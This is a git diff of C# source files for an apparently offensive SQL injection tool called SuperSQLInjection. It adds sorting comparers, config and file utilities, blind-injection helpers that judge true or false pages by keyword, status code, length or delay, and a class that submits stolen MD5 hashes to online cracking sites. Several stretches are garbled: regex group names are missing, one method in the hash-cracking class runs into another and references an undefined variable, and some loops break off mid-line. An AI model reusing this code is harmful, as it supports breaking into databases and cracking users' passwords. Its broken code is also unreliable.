+ ListViewItem listviewX, listviewY;
+
+ // 将比较对象转换为ListViewItem对象
+ listviewX = (ListViewItem)x;
+ listviewY = (ListViewItem)y;
+
+ // 比较
+ compareResult = new MyCopare().Compare(listviewX.SubItems[ColumnToSort].Text, listviewY.SubItems[ColumnToSort].Text);
+
+ // 根据上面的比较结果返回正确的比较结果
+ if (OrderOfSort == SortOrder.Ascending)
+ {
+ // 因为是正序排序,所以直接返回结果
+ return compareResult;
+ }
+ else if (OrderOfSort == SortOrder.Descending)
+ {
+ // 如果是反序排序,所以要取负值再返回
+ return (-compareResult);
+ }
+ else
+ {
+ // 如果相等返回0
+ return 0;
+ }
+ }
+
+ /**/
+ ///
+ /// 获取或设置按照哪一列排序.
+ ///
+ public int SortColumn
+ {
+ set
+ {
+ ColumnToSort = value;
+ }
+ get
+ {
+ return ColumnToSort;
+ }
+ }
+
+ /**/
+ ///
+ /// 获取或设置排序方式.
+ ///
+ public SortOrder Order
+ {
+ set
+ {
+ OrderOfSort = value;
+ }
+ get
+ {
+ return OrderOfSort;
+ }
+ }
+ }
+}
+
diff --git a/SuperSQLInjection/tools/MyCopare.cs b/SuperSQLInjection/tools/MyCopare.cs
new file mode 100644
index 0000000..98b98ad
--- /dev/null
+++ b/SuperSQLInjection/tools/MyCopare.cs
@@ -0,0 +1,33 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+
+namespace SuperSQLInjection.tools
+{
+ class MyCopare : System.Collections.IComparer
+ {
+ public int Compare(object x, object y)
+ {
+ string s1 = (string)x;
+
+ string s2 = (string)y;
+
+ if (s1.Length > s2.Length) return 1;
+
+ if (s1.Length < s2.Length) return -1;
+
+ for (int i = 0; i < s1.Length; i++)
+ {
+
+ if (s1[i] > s2[i]) return 1;
+
+ if (s1[i] < s2[i]) return -1;
+
+ }
+
+ return 0;
+
+ }
+ }
+}
diff --git a/SuperSQLInjection/tools/OnlineMD5.cs b/SuperSQLInjection/tools/OnlineMD5.cs
new file mode 100644
index 0000000..8ea2175
--- /dev/null
+++ b/SuperSQLInjection/tools/OnlineMD5.cs
@@ -0,0 +1,77 @@
+using model;
+using System;
+using System.Collections.Generic;
+using System.Net;
+using System.Text;
+using System.Text.RegularExpressions;
+
+namespace SuperSQLInjection.tools
+{
+ class OnlineMD5
+ {
+
+ public static String decodeMD5_cmd5(String md5){
+ ServerInfo server_index=HTTPRequest.getHtml("http://www.cmd5.com/",null,null);
+ String VIEWSTATE = Regex.Match(server_index.body, "VIEWSTATE\" value=\"(?\\S+)\"").Groups["result"].Value;
+
+ String data = "__VIEWSTATE=" + VIEWSTATE + "&ctl00%24ContentPlaceHolder1%24TextBoxInput=" + md5 + "&ctl00%24ContentPlaceHolder1%24InputHashType=md5&ctl00%24ContentPlaceHolder1%24Button1=%E8%A7%A3%E5%AF%86";
+ ServerInfo server_result = HTTPRequest.getHtmlByPost("http://www.cmd5.com", data, "http://www.cmd5.com/", server_index.cookies);
+ String result = Regex.Match(server_result.body, "Answer\">(?\\S+)\\S+)\"").Groups["result"].Value;
+ String sand = Regex.Match(server_index.body, "sand\" value=\"(?\\S+)\"").Groups["result"].Value;
+ if (token.Length > 1) {
+
+ ServerInfo server_result = HTTPRequest.getHtmlByPost("http://www.md5.com.cn/md5reverse", "md=" + md5 + "&sand=" + sand + "&token=" + token + "&submit=MD5+Crack", "http://www.md5.com.cn/", server_index.cookies);
+ String result = Regex.Match(server_result.body, "green\">(?\\S+)").Groups["result"].Value;
+ return result;
+ }
+ return "接口异常";
+
+ }
+ public static String decodeMD5_xmd5_org(String md5)
+ {
+
+ ServerInfo server_index = HTTPRequest.getHtml("http://www.xmd5.org", null, null);
+
+ ServerInfo server_result = HTTPRequest.getHtml("http://www.xmd5.org/md5/search.asp?hash="+md5+"&xmd5=MD5+%BD%E2%C3%DC", "http://www.xmd5.org/", server_index.cookies);
+ String result = Regex.Match(server_result.body, "ff\" size=\"3\">(?\\S+) ").Groups["result"].Value;
+ return result;
+ }
+
+ public static String decodeMD5_somd5_com(String md5)
+ {
+
+ ServerInfo server_result = HTTPRequest.getHtmlByPost("http://www.somd5.com/somd5-index-md5.html", "isajax=sJUVsBd1XOzFDPynHEfSnSt&md5=" + md5, "http://www.somd5.com/", null);
+ String result = Regex.Match(server_result.body, "inline;\">(?\\S+)").Groups["result"].Value;
+ return result;
+ }
+ public static String decodeMD5_md5_cc(String md5)
+ {
+
+ ServerInfo server_result = HTTPRequest.getHtml("http://www.md5.cc/ShowMD5Info.asp?GetType=ShowInfo&md5_str="+md5, "http://www.md5.cc/", null);
+ String result = Regex.Match(server_result.body, "px\">(?\\S+)").Groups["result"].Value;
+ return result;
+ }
+
+ public static String decodeMD5_pmd5_com(String md5)
+ {
+ ServerInfo server_index = HTTPRequest.getHtml("http://pmd5.com/", null, null);
+ String VIEWSTATE = Regex.Match(server_index.body, "VIEWSTATE\" value=\"(?\\S+)\"").Groups["result"].Value;
+ String EVENTVALIDATION = Regex.Match(server_index.body, "EVENTVALIDATION\" value=\"(?\\S+)\"").Groups["result"].Value;
+
+ String data = "__VIEWSTATE=" + VIEWSTATE + "&__EVENTVALIDATION=" + EVENTVALIDATION + "&key=" + md5 + "&jiemi=MD5%E8%A7%A3%E5%AF%86";
+ ServerInfo server_result = HTTPRequest.getHtmlByPost("http://pmd5.com/?action=getpwd", data, "http://pmd5.com/", server_index.cookies);
+ String result = Regex.Match(server_result.body, "为“(?\\S+)").Groups["result"].Value;
+ return result;
+
+ }
+ }
+}
diff --git a/SuperSQLInjection/tools/StringLengthComparer.cs b/SuperSQLInjection/tools/StringLengthComparer.cs
new file mode 100644
index 0000000..0cbec8c
--- /dev/null
+++ b/SuperSQLInjection/tools/StringLengthComparer.cs
@@ -0,0 +1,24 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+
+namespace tools
+{
+ class StringLengthComparer : System.Collections.IComparer
+ {
+ public int Compare(object x, object y)
+ {
+ string s1 = (string)x;
+
+ string s2 = (string)y;
+
+ if (s1.Length > s2.Length) return -1;
+
+ if (s1.Length < s2.Length) return 1;
+ return 0;
+
+ }
+
+ }
+}
diff --git a/SuperSQLInjection/tools/Tools.cs b/SuperSQLInjection/tools/Tools.cs
new file mode 100644
index 0000000..7720448
--- /dev/null
+++ b/SuperSQLInjection/tools/Tools.cs
@@ -0,0 +1,723 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+using System.IO;
+using System.Net;
+using System.Text.RegularExpressions;
+using System.Net.Sockets;
+using System.Threading;
+using tools;
+using model;
+using System.Globalization;
+using System.Security.Cryptography;
+using System.Windows.Forms;
+using SuperSQLInjection.model;
+using SuperSQLInjection;
+using SuperSQLInjection.tools;
+
+namespace tools
+{
+ class Tools
+ {
+ public const String httpLogPath = "logs/http/";
+
+ public static long currentMillis()
+ {
+ return (long)(DateTime.UtcNow - new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc)).TotalMilliseconds;
+ }
+ public static bool ThreadPoolIsEnd()
+ {
+ int workerThreads = 0;
+ int maxWordThreads = 0;
+ //int
+ int compleThreads = 0;
+ ThreadPool.GetAvailableThreads(out workerThreads, out compleThreads);
+ ThreadPool.GetMaxThreads(out maxWordThreads, out compleThreads);
+
+ if (maxWordThreads == workerThreads)
+ {
+ return true;
+ }
+ else {
+ return false;
+ }
+ }
+
+ public static void SysLog(String log)
+ {
+ FileTool.AppendLogToFile("logs/" + DateTime.Now.ToLongDateString() + ".log.txt", log + "----" + DateTime.Now);
+ }
+
+ public static String RandStr(int len)
+ {
+ StringBuilder str = new StringBuilder();
+ Random rd = new Random();
+ for (int i=0;i
+ /// 二分法取较大整数,用于盲注判断
+ ///
+ ///
+ ///
+ ///
+ public static int getLargeNum(int start,int end){
+
+ int sum=start+end;
+ if (sum == 1) {
+ return 0;
+ }
+ if (sum % 2 == 0)
+ {
+ return sum / 2;
+ }
+ else {
+ return sum / 2;
+ }
+
+ }
+
+
+ public static String unHexByUnicode(int unicode,String encoding){
+
+ int c = Tools.UnicodeInt2UTF8Int(unicode);
+ return Tools.unHex(Convert.ToString(c, 16), encoding);
+
+ }
+
+ public static String hexToRaw(string str,String encoding){
+ if (str.Length % 2 == 0)
+ {
+ byte[] b = new byte[str.Length / 2];
+ int j = 0;
+ for (int i = 0; i < str.Length; i += 2){
+ byte by = Convert.ToByte(str.Substring(i, 2), 16);//取两个字符,转换成对应的字节
+ b[j] = by;
+ j++;
+ }
+ return Encoding.GetEncoding(encoding).GetString(b);
+ }
+ else{
+ throw new Exception("不能将该字符串转换成String类型!");
+ }
+ }
+
+ public static void sysHTTPLog(String index ,ServerInfo server)
+ {
+ FileTool.AppendLogToFile(httpLogPath + index + "-request.txt", server.request);
+ FileTool.AppendLogToFile(httpLogPath + index + "-response.txt", server.header + "\r\n\r\n" + server.body);
+ }
+
+ public static void delHTTPLog()
+ {
+ try
+ {
+ DirectoryInfo din = new DirectoryInfo(httpLogPath);
+ FileInfo[] files = din.GetFiles();
+ foreach (FileInfo f in files)
+ {
+ f.Delete();
+ }
+ }
+ catch (Exception re)
+ {
+ Tools.SysLog("删除HTTP日志发生错误!" + re.Message);
+ }
+ }
+
+
+ ///
+ /// Hex解码
+ ///
+ /// Hex编码
+ /// 字符编码
+ ///
+ public static string unHex(string hex, string charset){
+ if (hex == null)throw new ArgumentNullException("hex");
+ hex = hex.Replace(",", "");
+ hex = hex.Replace("\n", "");
+ hex = hex.Replace("\\", "");
+ hex = hex.Replace(" ", "");
+ if (hex.Length % 2 != 0){
+ hex += "20";//空格
+ }
+ // 需要将 hex 转换成 byte 数组。
+ byte[] bytes = new byte[hex.Length / 2];
+ for (int i = 0; i < bytes.Length; i++){
+ try{
+ // 每两个字符是一个 byte。
+ bytes[i] = byte.Parse(hex.Substring(i * 2, 2),
+ System.Globalization.NumberStyles.HexNumber);
+ } catch{
+ // Rethrow an exception with custom message.
+ SysLog("unHex解码错误---hex is not a valid hex number!");
+ }
+ }
+ Encoding chs = Encoding.GetEncoding(charset);
+ return chs.GetString(bytes);
+ }
+ ///
+ /// 将数组转换成字符串
+ ///
+ ///
+ ///
+ public static String convertToString(String[] strs){
+
+ StringBuilder sb = new StringBuilder();
+ foreach(String s in strs){
+ sb.Append(s);
+ }
+ return sb.ToString();
+
+ }
+
+ ///
+ /// 将字符串转换成数字,错误返回0
+ ///
+ /// 字符串
+ ///
+ public static int convertToInt(String str)
+ {
+
+ try
+ {
+ return int.Parse(str);
+ }
+ catch (Exception e) {
+ Tools.SysLog("info:-"+e.Message);
+ }
+ return 0;
+
+ }
+ ///
+ /// 将16进制转换成10进制
+ ///
+ /// 16进制字符串
+ ///
+ public static int convertToIntBy16(String str)
+ {
+ try
+ {
+ return Convert.ToInt32(str,16);
+ }
+ catch (Exception e)
+ {
+
+ }
+ return 0;
+
+ }
+
+ public static int findKeyCount(String str,String key)
+ {
+ int count = 0;
+ try
+ {
+ if (!String.IsNullOrEmpty(str))
+ {
+ int index = 0;
+
+ while (index != -1)
+ {
+ index = str.IndexOf(key, index + 1);
+ if (index != -1)
+ {
+ count++;
+ }
+ }
+ }
+ }
+ catch (Exception e)
+ {
+ Tools.SysLog("findKeyCount发生异常!"+e.Message);
+ }
+ return count;
+
+ }
+
+ public static Boolean checkEmpty(String str) {
+
+ if (str != null && str.Length > 0)
+ {
+ return false;
+ }
+ else {
+ return true;
+ }
+ }
+
+ public static String StringArrayToString(String[] array)
+ {
+ StringBuilder sb = new StringBuilder();
+ foreach (String s in array) {
+
+ if (s != null)
+ {
+
+ sb.Append(s);
+ }
+ else {
+
+ sb.Append("_");
+ }
+
+ }
+ return sb.ToString();
+ }
+ ///
+ /// 判断页面注入true或false
+ ///
+ /// 服务器响应对象ServerInfo
+ /// 是否使用状态码判断
+ /// 关键字
+ ///
+ public static Boolean isTrue(ServerInfo server,String key,Boolean reverKey,KeyType keyType)
+ {
+ switch (keyType) {
+ case KeyType.Key:
+
+ //用关键字判断
+ if (server.body.Length > 0 && server.body.IndexOf(key) != -1)
+ {
+ if (reverKey)
+ {
+ return false;
+ }
+ return true;
+ }
+ else
+ {
+ if (reverKey)
+ {
+ return true;
+ }
+ return false;
+ }
+
+ case KeyType.Code:
+ //用状态码判断
+ if (server.code > 0 && key.Equals(server.code + ""))
+ {
+ if (reverKey)
+ {
+ return false;
+ }
+ return true;
+ }
+ else
+ {
+ if (reverKey)
+ {
+ return true;
+ }
+ return false;
+ }
+ case KeyType.Length:
+ //用长度判断
+ if (key.Equals(server.length.ToString()))
+ {
+ if (reverKey)
+ {
+ return false;
+ }
+ return true;
+ }
+ else
+ {
+ if (reverKey)
+ {
+ return true;
+ }
+ return false;
+ }
+
+ case KeyType.Time:
+ int time = Tools.convertToInt(key);
+ if (server.runTime > time*1000)
+ {
+ if (reverKey)
+ {
+ return false;
+ }
+ return true;
+ }
+ else
+ {
+ if (reverKey)
+ {
+ return true;
+ }
+ return false;
+ }
+
+ }
+ return false;
+
+ }
+
+ public static String strToHex(String str,String encode)
+ {
+ try
+ {
+
+ StringBuilder sb = new StringBuilder();// 存储转换后的编码
+ Byte[] strByte=Encoding.GetEncoding(encode).GetBytes(str);
+ foreach (Byte s in strByte)
+ {
+ sb.Append(s.ToString("x").PadLeft(2, '0'));
+ }
+ return "0x" + sb.ToString();
+
+
+ }
+ catch (Exception e)
+ {
+ Tools.SysLog("hex转换错误,传递str:" + str + ",encode:" + encode + "!错误消息:" + e.Message);
+ }
+ return "";
+ }
+ public static int UnicodeInt2UTF8Int(int UnicodeInt)
+ {
+ if (UnicodeInt < 128)
+ {
+ return UnicodeInt;
+ }
+ int num = UnicodeInt >> 12 & 15;
+ int num2 = UnicodeInt >> 6 & 63;
+ int num3 = UnicodeInt & 63;
+ return (num + 224 << 16) + (num2 + 128 << 8) + (num3 + 128);
+ }
+
+ public static int UTF8Int2UnicodeInt(int UTF8Int)
+ {
+ if (UTF8Int < 128)
+ {
+ return UTF8Int;
+ }
+ int num = UTF8Int >> 16 & 15;
+ int num2 = UTF8Int >> 8 & 63;
+ int num3 = UTF8Int & 63;
+ return (num << 12) + (num2 << 6) + num3;
+ }
+
+ public static String randIP()
+ {
+ Random rd = new Random();
+
+ String ip = rd.Next(1, 255) + "." + rd.Next(1, 255) + "." + rd.Next(1, 255) + "." + rd.Next(1, 255);
+
+ return ip;
+ }
+
+ public static String stringToAscii(String str)
+ {
+ char[] cstr = str.ToCharArray();
+ StringBuilder sb = new StringBuilder();
+ foreach (char c in cstr) {
+ sb.Append(Convert.ToInt32(c) + " ");
+ }
+ if (sb.Length > 1) {
+ sb.Remove(sb.Length - 1, 1);
+ }
+ return sb.ToString();
+ }
+
+ public static String asciiToString(String str)
+ {
+ try
+ {
+ String[] sstr = str.Split(' ');
+ StringBuilder sb = new StringBuilder();
+ foreach (String c in sstr)
+ {
+ sb.Append(((char)(int.Parse(c))));
+ }
+ return sb.ToString();
+ }
+ catch (Exception e) {
+
+ Tools.SysLog("waring:asciiToString发生错误,"+e.Message);
+
+ }
+ return "";
+ }
+
+ public static decimal getLike(String body1, String body2)
+ {
+
+ String[] keys1 = Regex.Split(body1, "[^\\u0080-\\uFFFF\\w\\-\\d]+");
+ String[] keys2 = Regex.Split(body2, "[^\\u0080-\\uFFFF\\w\\-\\d]+");
+
+ HashSet hash1 = new HashSet();
+ HashSet hash2 = new HashSet();
+ foreach (String key in keys1)
+ {
+ if (!hash1.Contains(key))
+ {
+ hash1.Add(key);
+ }
+ }
+ foreach (String key in keys2)
+ {
+ if (!hash2.Contains(key))
+ {
+ hash2.Add(key);
+ }
+ }
+ int count = 0;
+ foreach (String key in hash2)
+ {
+ if (hash1.Contains(key))
+ {
+ count++;
+ }
+ }
+ decimal p = 0;
+ if (hash1.Count > 0)
+ {
+ decimal cc = (decimal)((float)count * 100 / hash1.Count);
+ p = decimal.Round(cc, 2);
+ }
+ return p;
+ }
+
+ public static String findKeyByStr(String trueString, String falseString, String oldString)
+ {
+ try
+ { //以时间判断
+ String key = "";
+
+ String[] Keys = Regex.Split(oldString, "[^\\u0080-\\uFFFF\\w\\d]+");
+ Array.Sort(Keys, new StringLengthComparer());
+ foreach (String ckey in Keys) {
+ if (falseString.IndexOf(ckey) == -1 && trueString.IndexOf(ckey) >= 0) {
+ return ckey;
+ }
+ }
+ for (int length = 5; length >= 1; length--)
+ {
+ for (int i = 0; i < trueString.Length - length; i++)
+ {
+ if (trueString.Length <= length && !trueString.Equals(falseString))
+ {
+ return trueString;
+ }
+ String tempKey = trueString.Substring(i, length);
+ if (falseString.IndexOf(tempKey) == -1&& oldString.IndexOf(key)>=0)
+ {
+ key = tempKey;
+ Regex regex = new Regex("[\\S]+");
+ //非制表符,返回结果,否则继续查看是否还有其他关键词
+ if (regex.IsMatch(key)) {
+ return key;
+ }
+ }
+
+ }
+
+ }
+ return key;
+
+ }
+ catch (Exception e)
+ {
+
+ Tools.SysLog("warin:查找注入关键字发生错误," + e.Message);
+
+ }
+ return "";
+ }
+ public static int findKeyByCode(int trueCode, int falseCode)
+ {
+ if (trueCode != falseCode) {
+ return trueCode;
+ }
+ return 0;
+
+ }
+
+ public static int findKeyByTime(int trueTime, int falseTime,int maxTime)
+ {
+ if (trueTime > maxTime&&falseTime 0)
+ {
+ return url.Substring(0,index);
+
+ }
+ else {
+
+ return url;
+ }
+ }
+
+ public static String getCurrentPath(String url)
+ {
+ int index =url.LastIndexOf("/");
+
+ if (index != -1)
+ {
+ return url.Substring(0,index)+"/";
+ }
+ else {
+ return "";
+ }
+ }
+
+ public static String getRootDomain(String domain)
+ {
+ int index = domain.LastIndexOf(".");
+
+ if (index>0)
+ {
+ int index2 = domain.LastIndexOf(".", index - 1);
+ if (index2 != -1)
+ {
+ return domain.Substring(index2+1);
+ }
+
+ }
+ return domain;
+ }
+
+ public static String md5_16(String str){
+ MD5CryptoServiceProvider md5 = new MD5CryptoServiceProvider();
+ String t2 = BitConverter.ToString(md5.ComputeHash(UTF8Encoding.UTF8.GetBytes(str)), 4, 8);
+ t2 = t2.Replace("-", "");
+ t2 = t2.ToLower();
+ return t2;
+ }
+ public static String md5_32(String str)
+ {
+ MD5 md5 = MD5.Create();//实例化一个md5对像
+ // 加密后是一个字节类型的数组,这里要注意编码UTF8/Unicode等的选择
+ byte[] s = md5.ComputeHash(Encoding.UTF8.GetBytes(str));
+ // 通过使用循环,将字节类型的数组转换为字符串,此字符串是常规字符格式化所得
+ String pwd = "";
+ for (int i = 0; i < s.Length; i++)
+ {
+ //将得到的字符串使用十六进制类型格式。格式后的字符是小写的字母,如果使用大写(X)则格式后的字符是大写字符
+ pwd = pwd + s[i].ToString("X");
+ }
+ return pwd;
+
+ }
+ public static bool isExistsNode(TreeNodeCollection tvws, String key)
+ {
+
+ foreach (TreeNode tn in tvws)
+ {
+
+ if (tn.Text.Equals(key))
+ {
+ return true;
+ }
+ }
+
+ return false;
+
+ }
+
+
+ public static String changeRequestMethod(String datapack)
+ {
+ if (datapack.StartsWith("GET"))
+ {
+ int pl = datapack.IndexOf("?");
+ if (pl != -1) {
+ int el = datapack.IndexOf(" ",pl);
+ if (el != -1) {
+
+ String cparams= datapack.Substring(pl+1,el-pl-1);
+ datapack = datapack.Replace("?"+ cparams,"");
+ int sl= datapack.IndexOf("\r\n");
+ datapack= datapack.Insert(sl, "\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0");
+ int ssl = datapack.IndexOf("\r\n\r\n");
+ if (!datapack.EndsWith("\r\n\r\n")) {
+
+ datapack += "\r\n\r\n";
+ }
+ datapack+=cparams;
+
+ int me = datapack.IndexOf(" ");
+ if (me != -1) {
+
+ datapack = "POST" + datapack.Substring(me, datapack.Length - me);
+ }
+
+ return datapack;
+ }
+ }
+ }
+
+ else if (datapack.StartsWith("POST"))
+ {
+ int ssl = datapack.IndexOf("\r\n\r\n");
+
+ if (ssl != -1) {
+
+
+ String cparams = datapack.Substring(ssl+4,datapack.Length- ssl - 4);
+ datapack = datapack.Substring(0, ssl+1);
+ int cys = datapack.IndexOf("Content-Type");
+ int cye = datapack.IndexOf("\r\n",cys);
+
+ if (cye > cys) {
+ datapack=datapack.Remove(cys, cye - cys+2);
+ }
+ int cls = datapack.IndexOf("Content-Length");
+ int cle = datapack.IndexOf("\r\n", cls+1);
+ if (cle > cls)
+ {
+ datapack = datapack.Remove(cls, cle - cls+2);
+ }
+
+ int hl = datapack.IndexOf(" HTTP");
+ if (hl != -1) {
+
+ datapack = datapack.Insert(hl, "?"+cparams);
+ }
+
+ int me = datapack.IndexOf(" ");
+
+ if (me != -1)
+ {
+
+ datapack = "GET" + datapack.Substring(me, datapack.Length - me);
+ }
+ }
+ }
+
+ return datapack;
+
+ }
+ }
+}
diff --git a/SuperSQLInjection/tools/XML.cs b/SuperSQLInjection/tools/XML.cs
new file mode 100644
index 0000000..24e16c4
--- /dev/null
+++ b/SuperSQLInjection/tools/XML.cs
@@ -0,0 +1,124 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+using System.Xml;
+using SuperSQLInjection.model;
+using System.IO;
+using System.Xml.Serialization;
+using System.Windows.Forms;
+
+namespace SuperSQLInjection.tools
+{
+ class XML
+ {
+ public static Boolean SaveMyConfig(){
+ XmlDocument doc = new XmlDocument();
+ XmlDeclaration xdl= doc.CreateXmlDeclaration("1.0", "UTF-8", null);
+ doc.AppendChild(xdl);
+ return true;
+ }
+
+ public static void saveConfig(String fileName,Config config)
+ {
+ Stream fStream = null;
+ try
+ {
+ fStream = new FileStream(fileName, FileMode.Create, FileAccess.ReadWrite);
+ //创建XML序列化器,需要指定对象的类型
+ XmlSerializer xmlFormat = new XmlSerializer(typeof(Config));
+ xmlFormat.Serialize(fStream, config);
+
+ }
+ catch (Exception e)
+ {
+
+ throw e;
+ }
+ finally {
+ if(fStream!=null){
+ fStream.Close();
+ }
+
+ }
+ }
+
+ public static Config readConfig(String configPath)
+ {
+ Stream fStream = null;
+ try
+ {
+ XmlSerializer xml = new XmlSerializer(typeof(Config));
+ //创建XML序列化器,需要指定对象的类型
+ fStream = new FileStream(configPath, FileMode.Open, FileAccess.ReadWrite);
+ XmlTextReader reader = new XmlTextReader(fStream);
+ reader.Normalization = false;
+ Config config = (Config)xml.Deserialize(reader);
+ return config;
+ }
+ catch (Exception e)
+ {
+
+ throw e;
+ }
+ finally {
+ if (fStream != null) {
+
+ fStream.Close();
+ }
+ }
+ }
+
+ public static void saveDBS(String fileName, DataBase dbs)
+ {
+ Stream fStream = null;
+ try
+ {
+ fStream = new FileStream(fileName, FileMode.Create, FileAccess.ReadWrite);
+ //创建XML序列化器,需要指定对象的类型
+ XmlSerializer xmlFormat = new XmlSerializer(typeof(DataBase));
+ xmlFormat.Serialize(fStream, dbs);
+ }
+ catch (Exception e)
+ {
+
+ throw e;
+ }
+ finally
+ {
+ if (fStream != null)
+ {
+ fStream.Close();
+ }
+
+ }
+ }
+
+ public static DataBase readDBS(String path)
+ {
+ Stream fStream = null;
+ try
+ {
+ XmlSerializer xml = new XmlSerializer(typeof(DataBase));
+ //创建XML序列化器,需要指定对象的类型
+ fStream = new FileStream(path, FileMode.Open, FileAccess.ReadWrite);
+ XmlTextReader reader = new XmlTextReader(fStream);
+ reader.Normalization = false;
+ DataBase config = (DataBase)xml.Deserialize(reader);
+ return config;
+ }
+ catch (Exception e)
+ {
+
+ throw e;
+ }
+ finally
+ {
+ if (fStream != null)
+ {
+
+ fStream.Close();
+ }
+ }
+ }
+ }
+}
diff --git a/SuperSQLInjection/tools/encode/URLEncode.cs b/SuperSQLInjection/tools/encode/URLEncode.cs
new file mode 100644
index 0000000..c0234a2
--- /dev/null
+++ b/SuperSQLInjection/tools/encode/URLEncode.cs
@@ -0,0 +1,101 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+
+namespace SuperSQLInjection.tools
+{
+ class URLEncode
+ {
+
+ public static string UrlEncode(string sInput)
+ {
+ return UrlEncodeChars(sInput, Encoding.UTF8);
+ }
+ public static string UrlEncode(string sInput, Encoding oEnc)
+ {
+ return UrlEncodeChars(sInput, oEnc);
+ }
+ private static string UrlEncodeChars(string str, Encoding oEnc)
+ {
+ if (string.IsNullOrEmpty(str))
+ {
+ return str;
+ }
+ StringBuilder stringBuilder = new StringBuilder();
+ for (int i = 0; i < str.Length; i++)
+ {
+ char c = str[i];
+ if ((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9') || c == '-' || c == '.' || c == '(' || c == ')' || c == '*' || c == '\'' || c == '_' || c == '!')
+ {
+ stringBuilder.Append(c);
+ }
+ else
+ {
+ byte[] bytes = oEnc.GetBytes(new char[]{c});
+ byte[] array = bytes;
+ for (int j = 0; j < array.Length; j++)
+ {
+ byte b = array[j];
+ stringBuilder.Append("%");
+ stringBuilder.Append(b.ToString("x2"));
+ }
+ }
+ }
+ return stringBuilder.ToString();
+ }
+ // Fiddler.Utilities
+ public static string UrlPathEncode(string str)
+ {
+ if (string.IsNullOrEmpty(str))
+ {
+ return str;
+ }
+ int num = str.IndexOf('?');
+ if (num >= 0)
+ {
+ return UrlPathEncode(str.Substring(0, num)) + str.Substring(num);
+ }
+ return UrlPathEncodeChars(str);
+ }
+
+ private static string UrlPathEncodeChars(string str)
+ {
+ if (string.IsNullOrEmpty(str))
+ {
+ return str;
+ }
+ StringBuilder stringBuilder = new StringBuilder();
+ for (int i = 0; i < str.Length; i++)
+ {
+ char c = str[i];
+ if (c > ' ' && c < '\u007f')
+ {
+ stringBuilder.Append(c);
+ }
+ else
+ {
+ if (c < '!')
+ {
+ stringBuilder.Append("%");
+ stringBuilder.Append(((byte)c).ToString("X2"));
+ }
+ else
+ {
+ byte[] bytes = Encoding.UTF8.GetBytes(new char[]
+ {
+ c
+ });
+ byte[] array = bytes;
+ for (int j = 0; j < array.Length; j++)
+ {
+ byte b = array[j];
+ stringBuilder.Append("%");
+ stringBuilder.Append(b.ToString("X2"));
+ }
+ }
+ }
+ }
+ return stringBuilder.ToString();
+ }
+ }
+}
diff --git a/SuperSQLInjection/tools/encode/URLTools.cs b/SuperSQLInjection/tools/encode/URLTools.cs
new file mode 100644
index 0000000..e49eea1
--- /dev/null
+++ b/SuperSQLInjection/tools/encode/URLTools.cs
@@ -0,0 +1,27 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+using model;
+
+namespace SuperSQLInjection.tools
+{
+ class URLTools
+ {
+ public static ServerInfo getHostAndPathQueryByURL(String url){
+
+ try
+ {
+ ServerInfo server = new ServerInfo();
+ Uri uri = new Uri(url);
+ server.host = uri.Host;
+ server.url = uri.PathAndQuery;
+ server.port = uri.Port;
+ return server;
+ }
+ catch (Exception e) {
+
+ throw e;
+ }
+ }
+ }
+}
diff --git a/SuperSQLInjection/tools/file/FileTool.cs b/SuperSQLInjection/tools/file/FileTool.cs
new file mode 100644
index 0000000..1f99ee9
--- /dev/null
+++ b/SuperSQLInjection/tools/file/FileTool.cs
@@ -0,0 +1,217 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+using System.IO;
+
+namespace tools
+{
+ class FileTool
+ {
+ public static List readAllDic(String dic)
+ {
+ List fs = new List();
+ try
+ {
+ DirectoryInfo din = new DirectoryInfo(AppDomain.CurrentDomain.BaseDirectory+"/"+dic);
+ FileInfo[] files = din.GetFiles();
+ foreach (FileInfo f in files)
+ {
+ fs.Add(f.Name);
+ }
+ }
+ catch (Exception re)
+ {
+ Tools.SysLog(dic + "读取错误!" + re.Message);
+ }
+ return fs;
+ }
+ public static List readFileToList(String path)
+ {
+
+ List list = new List();
+ FileStream fs_dir = null;
+ StreamReader reader = null;
+ try
+ {
+ fs_dir = new FileStream(AppDomain.CurrentDomain.BaseDirectory + "/" + path, FileMode.Open, FileAccess.Read);
+
+ reader = new StreamReader(fs_dir);
+
+ String lineStr;
+
+ while ((lineStr = reader.ReadLine()) != null)
+ {
+ if (!lineStr.Equals(""))
+ {
+ list.Add(lineStr);
+ }
+ }
+ } catch (Exception e)
+ {
+ Tools.SysLog(e.Message);
+ }
+ finally {
+ if (reader != null)
+ {
+ reader.Close();
+ }
+ if (fs_dir != null)
+ {
+ fs_dir.Close();
+ }
+ }
+ return list;
+ }
+
+ public static HashSet readDomainToList(String path,Boolean isCleanExists)
+ {
+
+ HashSet list = new HashSet();
+ FileStream fs_dir = null;
+ StreamReader reader = null;
+ try
+ {
+ fs_dir = new FileStream(path, FileMode.Open, FileAccess.Read);
+
+ reader = new StreamReader(fs_dir);
+
+ String lineStr;
+
+ while ((lineStr = reader.ReadLine()) != null)
+ {
+ if (!lineStr.Equals("")&&!lineStr.StartsWith("http")) {
+ lineStr = "http://" + lineStr;
+ }
+ if (list.Contains(lineStr) && isCleanExists) {
+ continue;
+ }
+ list.Add(lineStr);
+
+ }
+ }
+ catch (Exception e)
+ {
+ Tools.SysLog(e.Message);
+ }
+ finally
+ {
+ if (reader != null)
+ {
+ reader.Close();
+ }
+ if (fs_dir != null)
+ {
+ fs_dir.Close();
+ }
+ }
+ return list;
+ }
+
+ //读取文件
+ public static String readFileToString(String path)
+ {
+ String str = "";
+ FileStream fs_dir=null;
+ StreamReader reader = null;
+ try
+ {
+ fs_dir = new FileStream(AppDomain.CurrentDomain.BaseDirectory + "/" + path, FileMode.Open, FileAccess.Read);
+ reader = new StreamReader(fs_dir);
+ str = reader.ReadToEnd();
+ }
+ catch (Exception e)
+ {
+ Tools.SysLog("readFileToString发生异常!"+e.Message);
+ }finally
+ {
+ if (reader != null)
+ {
+ reader.Close();
+ }
+ if (fs_dir != null)
+ {
+ fs_dir.Close();
+ }
+ }
+ return str;
+
+ }
+ //读取文件
+ public static Byte[] readFileToByte(String path,int a)
+ {
